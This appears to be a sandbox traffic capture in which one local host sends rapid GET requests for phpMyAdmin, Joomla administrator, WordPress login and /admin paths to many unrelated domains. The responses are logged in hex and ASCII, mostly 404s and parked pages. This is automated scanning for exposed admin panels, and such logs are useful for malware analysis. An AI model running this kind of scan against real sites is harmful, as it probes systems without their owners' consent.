2023-11-30 10:22:40 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:40 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:40 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	60228	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:40 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	60337	216.37.42.12	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:40 UTC	213	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 34 20 44 65 63 20 32 30 30 38 20 31 31 3a 31 30 3a 32 38 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:40 GMTServer: ApacheLast-Modified: Sun, 14 Dec 2008 11:10:28 GMTAccept-Ranges: bytesContent-Length: 1997Connection: closeContent-Type: text/html
2023-11-30 10:22:40 UTC	1997	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 45 43 4f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 72 72 6f 72 20 34 30 30 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="Generator" content="NOWECO"><meta name="description" content="Error 400"><title>Error 404</title><li

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	60088	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:41 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	59853	194.63.248.47	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	180	OUT	GET /administrator/index.php HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	180	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTServer: Apache/2.4.25 (Debian)Content-Length: 270Connection: closeContent-Type: text/html; charset=iso-8859-1
2023-11-30 10:22:41 UTC	270	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 443</address>

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	60311	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	251	OUT	GET /administrator/index.php HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	718	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 34 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 33 30 62 64 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 12477Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-30bd"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJ
2023-11-30 10:22:41 UTC	12477	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	60315	3.33.224.147	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	161	OUT	GET /admin HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	370	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 2d 4c 69 6d 69 74 3a 20 31 32 30 30 0d 0a 58 2d 52 61 74 65 4c 69 6d 69 74 Data Ascii: HTTP/1.1 302 FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateDate: Thu, 30 Nov 2023 10:22:40 GMTLocation: https://hna.beX-RateLimit-Limit: 1200X-RateLimit
2023-11-30 10:22:41 UTC	314	IN	Data Raw: 31 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 68 6e 61 2e 62 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 Data Ascii: 12e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://hna.be'" /> <title>Redirecting to https://hna.be</title> </head> <body> Redirecting to <a href="htt

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	60316	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	238	OUT	GET /wp-login.php HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	716	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:41 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	60314	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	284	OUT	GET /wp-login.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:40 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:41 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	60539	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:40 UTC	284	OUT	GET /wp-login.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
